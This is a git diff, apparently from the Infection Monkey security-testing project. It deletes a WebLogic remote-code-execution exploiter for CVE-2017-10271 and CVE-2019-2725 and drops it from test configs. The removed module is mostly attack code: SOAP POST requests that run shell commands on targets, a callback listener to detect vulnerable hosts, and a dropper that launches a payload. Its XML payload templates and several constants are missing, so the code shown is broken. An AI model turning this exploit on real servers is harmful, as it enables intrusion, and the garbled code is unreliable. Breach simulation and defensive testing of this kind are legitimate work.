diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
deleted file mode 100644
index 6c2d7d327..000000000
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ /dev/null
@@ -1,333 +0,0 @@
-import copy
-import logging
-import threading
-import time
-from http.server import BaseHTTPRequestHandler, HTTPServer
-from requests import exceptions, post
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.network.info import get_free_tcp_port
-from infection_monkey.network.tools import get_interface_to_target
-logger = logging.getLogger(__name__)
-# How long server waits for get request in seconds
-# How long should we wait after each request in seconds
-# How long to wait for a sign(request from host) that server is vulnerable. In seconds
-# How long to wait for response in exploitation. In seconds
-# Malicious requests' headers:
- "Content-Type": "text/xml;charset=UTF-8",
- "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
- "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
-class WebLogicExploiter(HostExploiter):
- def _exploit_host(self):
- exploiters = [WebLogic20192725, WebLogic201710271]
- for exploiter in exploiters:
- if exploiter(self.host).exploit_host():
- return True
-# Exploit based of:
-# Kevin Kirsche (d3c3pt10n)
-# https://github.com/kkirsche/CVE-2017-10271
-# and
-# Luffin from Github
-# https://github.com/Luffin/CVE-2017-10271
-# CVE: CVE-2017-10271
-class WebLogic201710271(WebRCE):
- URLS = [
- "/wls-wsat/CoordinatorPortType",
- "/wls-wsat/CoordinatorPortType11",
- "/wls-wsat/ParticipantPortType",
- "/wls-wsat/ParticipantPortType11",
- "/wls-wsat/RegistrationPortTypeRPC",
- "/wls-wsat/RegistrationPortTypeRPC11",
- "/wls-wsat/RegistrationRequesterPortType",
- "/wls-wsat/RegistrationRequesterPortType11",
- ]
- def __init__(self, host):
- super(WebLogic201710271, self).__init__(
- host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
- )
- def get_exploit_config(self):
- exploit_config = super(WebLogic201710271, self).get_exploit_config()
- exploit_config["stop_checking_urls"] = True
- exploit_config["url_extensions"] = WebLogic201710271.URLS
- return exploit_config
- def exploit(self, url, command):
- if "linux" in self.host.os["type"]:
- payload = self.get_exploit_payload(
- "/bin/sh", "-c", command + " 1> /dev/null 2> /dev/null"
- )
- else:
- payload = self.get_exploit_payload("cmd", "/c", command + " 1> NUL 2> NUL")
- try:
- post( # noqa: DUO123
- url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False
- )
- except Exception as e:
- logger.error("Connection error: %s" % e)
- return False
- return True
- def add_vulnerable_urls(self, urls, stop_checking=False):
- """
- Overrides parent method to use listener server
- """
- # Server might get response faster than it starts listening to it, we need a lock
- httpd, lock = self._start_http_server()
- exploitable = False
- for url in urls:
- if self.check_if_exploitable_weblogic(url, httpd):
- exploitable = True
- break
- if not exploitable and httpd.get_requests < 1:
- # Wait for responses
- time.sleep(REQUEST_TIMEOUT)
- if httpd.get_requests > 0:
- # Add all urls because we don't know which one is vulnerable
- self.vulnerable_urls.extend(urls)
- self.exploit_info["vulnerable_urls"] = self.vulnerable_urls
- else:
- logger.info("No vulnerable urls found, skipping.")
- self._stop_http_server(httpd, lock)
- def check_if_exploitable_weblogic(self, url, httpd):
- payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
- try:
- post( # noqa: DUO123
- url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False
- )
- except exceptions.ReadTimeout:
- # Our request will not get response thus we get ReadTimeout error
- pass
- except Exception as e:
- logger.error("Something went wrong: %s" % e)
- return httpd.get_requests > 0
- def _start_http_server(self):
- """
- Starts custom http server that waits for GET requests
- :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
- """
- lock = threading.Lock()
- local_port = get_free_tcp_port()
- local_ip = get_interface_to_target(self.host.ip_addr)
- httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
- lock.acquire()
- httpd.start()
- lock.acquire()
- return httpd, lock
- @staticmethod
- def _stop_http_server(httpd, lock):
- lock.release()
- httpd.join(SERVER_TIMEOUT)
- httpd.stop()
- @staticmethod
- def get_exploit_payload(cmd_base, cmd_opt, command):
- """
- Formats the payload used in exploiting weblogic servers
- :param cmd_base: What command prompt to use eg. cmd
- :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
- :param command: command itself
- :return: Formatted payload
- """
- empty_payload = """
- """
- payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
- return payload
- @staticmethod
- def get_test_payload(ip, port):
- """
- Gets payload used for testing whether weblogic server is vulnerable
- :param ip: Server's IP
- :param port: Server's port
- :return: Formatted payload
- """
- generic_check_payload = """
- http://{host}:{port}
- """
- payload = generic_check_payload.format(host=ip, port=port)
- return payload
- class IndicationHTTPServer(threading.Thread):
- """
- Http server built to wait for GET requests. Because oracle web logic vuln is blind,
- we determine if we can exploit by either getting a GET request from host or not.
- """
- def __init__(self, local_ip, local_port, lock, max_requests=1):
- self.local_ip = local_ip
- self.local_port = local_port
- self.get_requests = 0
- self.max_requests = max_requests
- self._stopped = False
- self.lock = lock
- threading.Thread.__init__(self)
- self.daemon = True
- def run(self):
- class S(BaseHTTPRequestHandler):
- @staticmethod
- def do_GET():
- logger.info("Server received a request from vulnerable machine")
- self.get_requests += 1
- logger.info("Server waiting for exploited machine request...")
- httpd = HTTPServer((self.local_ip, self.local_port), S)
- httpd.daemon = True
- self.lock.release()
- while not self._stopped and self.get_requests < self.max_requests:
- httpd.handle_request()
- self._stopped = True
- return httpd
- def stop(self):
- self._stopped = True
-# Exploit based of:
-# Andres Rodriguez (acamro)
-# https://github.com/rapid7/metasploit-framework/pull/11780
-class WebLogic20192725(WebRCE):
- URLS = ["_async/AsyncResponseServiceHttps"]
- def __init__(self, host):
- super(WebLogic20192725, self).__init__(host)
- def get_exploit_config(self):
- exploit_config = super(WebLogic20192725, self).get_exploit_config()
- exploit_config["url_extensions"] = WebLogic20192725.URLS
- exploit_config["dropper"] = True
- return exploit_config
- def execute_remote_monkey(self, url, path, dropper=False):
- # Without delay exploiter tries to launch monkey file that is still finishing up after
- # downloading.
- time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
- super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
- def exploit(self, url, command):
- if "linux" in self.host.os["type"]:
- payload = self.get_exploit_payload("/bin/sh", "-c", command)
- else:
- payload = self.get_exploit_payload("cmd", "/c", command)
- try:
- resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
- return resp
- except Exception as e:
- logger.error("Connection error: %s" % e)
- return False
- def check_if_exploitable(self, url):
- headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
- res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
- if res.status_code == 500 and "env:Client" in res.text:
- return True
- else:
- return False
- @staticmethod
- def get_exploit_payload(cmd_base, cmd_opt, command):
- """
- Formats the payload used to exploit weblogic servers
- :param cmd_base: What command prompt to use eg. cmd
- :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
- :param command: command itself
- :return: Formatted payload
- """
- empty_payload = """
- xx
- xx
- {cmd_base}
- {cmd_opt}
- {cmd_payload}
- """
- payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
- return payload
diff --git a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
index 1604c0690..439103396 100644
--- a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
@@ -56,7 +56,6 @@
"vulnerability": [
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
- {"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
index 5d89bc003..2f48f30a6 100644
--- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
@@ -50,7 +50,6 @@
- "WebLogicExploiter",
diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
index 14e2c8b49..1ffce78cf 100644
--- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@@ -5,7 +5,6 @@
- "WebLogicExploiter",
diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
index 8f7a37d63..84ea942f4 100644
--- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
@@ -201,7 +201,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
"vulnerability": [
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
- {"name": "WebLogicExploiter", "supported_os": [], "options": {}},
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},